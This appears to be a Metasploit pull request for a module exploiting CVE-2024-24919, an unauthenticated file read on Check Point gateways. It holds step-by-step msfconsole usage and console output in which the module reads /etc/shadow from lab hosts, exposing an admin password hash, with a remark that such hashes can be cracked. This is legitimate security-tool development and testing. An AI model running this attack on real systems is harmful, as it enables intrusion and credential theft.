Auxiliary module for CVE-2024-24919 - Check Point Security Gateway arbitrary file read

[remmons-r7]

This module leverages an unauthenticated arbitrary root file read vulnerability for Check Point Security Gateway appliances. When the IPSec VPN or Mobile Access blades are enabled on affected devices, traversal payloads can be used to read any files on the local file system. Password hashes read from disk may be cracked, potentially resulting in administrator-level access to the target device. This vulnerability is tracked as CVE-2024-24919.

Verification

1. Start msfconsole
2. use auxiliary/gather/checkpoint_gateway_fileread_cve_2024_24919
3. set RHOSTS <TARGET_IP_ADDRESS>
4. set RPORT <TARGET_PORT>
5. set TARGETFILE <TARGET_FILE_TO_READ>
6. set STORE_LOOT false if you want to display file on the console instead of storing it as loot.
7. run

Example usage

msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > show options 

Module options (auxiliary/gather/checkpoint_gateway_fileread_cve_2024_24919):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                       yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT       443              yes       The target port (TCP)
   SSL         false            no        Negotiate SSL/TLS for outgoing connections
   STORE_LOOT  false            yes       Store the target file as loot
   TARGETFILE  /etc/shadow      yes       The target file to read. This should be a full Linux file path. Files containing binary data may not be read accurately
   TARGETURI   /                yes       The URI path to Check Point Security Gateway
   VHOST                        no        HTTP server virtual host


View the full module info with the info, or info -d command.

msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > set RHOSTS 192.168.181.128
RHOSTS => 192.168.181.128
msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > set SSL true
[!] Changing the SSL option's value may require changing RPORT!
SSL => true
msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > check
[+] 192.168.181.128:443 - The target is vulnerable. Arbitrary file read successful!
msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > run
[*] Running module against 192.168.181.128

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Arbitrary file read successful!
[+] File read succeeded! 
admin:$6$hHJHiZdC2kHPD5HQ$/0dtMC53GSaZpLA/MeChOvJNNE4i9qoKL57Dsl853wF/RRNzJJ6CO5/qBmzCM7KdEUmXanF3J8T50ppLh/Sf2/:14559:0:99999:8:::
monitor:*:19872:0:99999:8:::
root:*:19872:0:99999:7:::
cp_routeevt:*:19872:0:99999:7:::
nobody:*:19872:0:99999:7:::
postfix:*:19872:0:99999:7:::
rpm:!!:19872:0:99999:7:::
shutdown:*:19872:0:99999:7:::
pcap:!!:19872:0:99999:7:::
halt:*:19872:0:99999:7:::
cp_postgres:*:19872:0:99999:7:::
cp_extensions:*:19872:0:99999:7:::
cpep_user:*:19872:0:99999:7:::
vcsa:!!:19872:0:99999:7:::
_nonlocl:*:19872:0:99999:7:::
sshd:*:19872:0:99999:7:::

[*] Auxiliary module execution completed

I'll privately share a capture of the module running with a member of the Metasploit team. Thank you!

[jheysel-r7]

Thanks for the great module @remmons-r7! Also for the steps to setup the test environment 👍 A couple minor comments but other than those it looks good to go.

Testing

STORE_LOOT = true

msf6 > db_connect msf_user:notpassword@127.0.0.1:5432/msf_database
[*] Connected to Postgres data service: 127.0.0.1/msf_database
msf6 > use gather/checkpoint_gateway_fileread_cve_2024_24919
msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > set rhosts 172.16.199.52
rhosts => 172.16.199.52
msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > set ssl true
[!] Changing the SSL option's value may require changing RPORT!
ssl => true
msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > set STORE_LOOT true
STORE_LOOT => true
msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > run
[*] Running module against 172.16.199.52

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Arbitrary file read successful!
[+] Stored the file data to loot...
[*] Auxiliary module execution completed
msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > loot

Loot
====

host           service  type    name         content     info                                                path
----           -------  ----    ----         -------     ----                                                ----
172.16.199.52           shadow  /etc/shadow  text/plain  File read from Check Point Security Gateway server  /home/msfuser/.msf4/loot/20240612161112_default_172.16.199.52_shadow_636575.txt

msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > cat /home/msfuser/.msf4/loot/20240612161112_default_172.16.199.52_shadow_636575.txt
[*] exec: cat /home/msfuser/.msf4/loot/20240612161112_default_172.16.199.52_shadow_636575.txt

admin:$6$1HTJt2ZTyvTkurfN$Dp.MQ2UXWJXTRBQQdiq1fDY3df0QB2KMzqq5Xpx6NN.WtgnRSZiMtMKVFyhlr5RtGmmNX.E0HueE5xaD7vzzN/:14559:0:99999:8:::
monitor:*:19886:0:99999:8:::
root:*:19886:0:99999:7:::
cp_routeevt:*:19886:0:99999:7:::
nobody:*:19886:0:99999:7:::
postfix:*:19886:0:99999:7:::
rpm:!!:19886:0:99999:7:::
shutdown:*:19886:0:99999:7:::
pcap:!!:19886:0:99999:7:::
halt:*:19886:0:99999:7:::
cp_postgres:*:19886:0:99999:7:::
cp_extensions:*:19886:0:99999:7:::
cpep_user:*:19886:0:99999:7:::
vcsa:!!:19886:0:99999:7:::
_nonlocl:*:19886:0:99999:7:::
sshd:*:19886:0:99999:7:::
msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) >

STORE_LOOT = false

msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > set rhosts 172.16.199.52
rhosts => 172.16.199.52
msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > set ssl true
[!] Changing the SSL option's value may require changing RPORT!
ssl => true
msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > run
[*] Running module against 172.16.199.52

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Arbitrary file read successful!
[+] File read succeeded!
admin:$6$1HTJt2ZTyvTkurfN$Dp.MQ2UXWJXTRBQQdiq1fDY3df0QB2KMzqq5Xpx6NN.WtgnRSZiMtMKVFyhlr5RtGmmNX.E0HueE5xaD7vzzN/:14559:0:99999:8:::
monitor:*:19886:0:99999:8:::
root:*:19886:0:99999:7:::
cp_routeevt:*:19886:0:99999:7:::
nobody:*:19886:0:99999:7:::
postfix:*:19886:0:99999:7:::
rpm:!!:19886:0:99999:7:::
shutdown:*:19886:0:99999:7:::
pcap:!!:19886:0:99999:7:::
halt:*:19886:0:99999:7:::
cp_postgres:*:19886:0:99999:7:::
cp_extensions:*:19886:0:99999:7:::
cpep_user:*:19886:0:99999:7:::
vcsa:!!:19886:0:99999:7:::
_nonlocl:*:19886:0:99999:7:::
sshd:*:19886:0:99999:7:::

[*] Auxiliary module execution completed

[jheysel-r7]

Release Notes

This module leverages an unauthenticated arbitrary root file read vulnerability for Check Point Security Gateway appliances. When the IPSec VPN or Mobile Access blades are enabled on affected devices, traversal payloads can be used to read any files on the local file system. This vulnerability is tracked as CVE-2024-24919.